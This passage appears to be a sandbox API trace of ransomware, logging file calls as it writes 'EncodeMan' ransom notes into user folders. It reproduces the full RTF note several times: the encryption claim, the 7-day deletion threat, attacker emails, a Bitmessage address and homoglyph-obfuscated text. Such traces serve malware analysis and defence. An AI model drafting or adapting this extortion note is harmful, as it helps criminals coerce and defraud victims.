ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0272.358] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0272.358] CloseHandle (hObject=0x294) returned 1 [0272.359] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\#readme_eman#.rtf")) returned 0xffffffff [0272.359] GetLastError () returned 0x2 [0272.359] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0272.359] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.359] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.359] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 